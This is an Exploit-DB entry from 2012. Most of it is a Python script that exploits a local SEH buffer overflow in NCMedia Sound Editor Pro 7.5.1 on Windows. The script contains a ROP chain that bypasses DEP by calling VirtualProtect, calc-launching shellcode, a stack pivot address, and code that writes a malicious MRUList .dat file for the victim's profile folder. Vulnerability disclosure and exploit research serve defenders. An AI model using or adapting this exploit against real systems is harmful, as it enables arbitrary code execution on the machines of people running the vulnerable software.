NCMedia Sound Editor Pro 7.5.1 - Local Overflow (SEH + DEP Bypass)

EDB-ID:

21713

CVE:



Author:

b33f

Type:

local


Platform:

Windows

Date:

2012-10-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP                          #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit)                  #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/     #
# Software: http://www.soundeditorpro.com/                                  #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\             #
#        open -> click "File" menu -> calc ;))                              #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the        #
# ROP-Chain as it was executed was "Oh no, not again"!                      #
#---------------------------------------------------------------------------#

import sys, socket, struct 

file="MRUList201202.dat"

#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"...   #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc)  # XCHG EAX,EBP # ADD AL,7C # RETN                                           \
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                             |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B                         | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN                                  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]                        | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll]                                               |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN                                           /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes)                                                 | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN                                /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN                                                            \  ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP                                                                   /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40                                                                | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN                                                             |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN  /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN                                                            \  RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect                                                              /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN                                                            \  NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP                                                                       /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN                                  |  PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#

#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
calc = (
"\x31\xD2"                      #
"\x52"                          #
"\x68\x63\x61\x6C\x63"          # Stack has arguments for
"\x89\xE6"                      # WinExec -> calc
"\x52"                          #
"\x56"                          ########
"\x64\x8B\x72\x30"              #
"\x8B\x76\x0C"                  #
"\x8B\x76\x0C"                  # Found Kernel32
"\xAD"                          # base address
"\x8B\x30"                      #
"\x8B\x7E\x18"                  ########
"\x8B\x5F\x3C"                  # Found export table offset
"\x8B\x5C\x1F\x78"              ########
"\x8B\x74\x1F\x20"              # Found export names table
"\x01\xFE"                      ########
"\x8B\x4C\x1F\x24"              # Found export ordinals table
"\x01\xF9"                      ########
"\x42"                          #
"\xAD"                          # Found WinExec ordinal
"\x81\x3C\x07\x57\x69\x6E\x45"  #
"\x75\xF5"                      ########
"\x0F\xB7\x54\x51\xFE"          #
"\x8B\x74\x1F\x1C"              #
"\x01\xFE"                      # Pop calc ;))
"\x03\x3C\x96"                  #
"\xFF\xD7")                     #

#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092}  # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "\x90"*10 + calc
poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"

try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"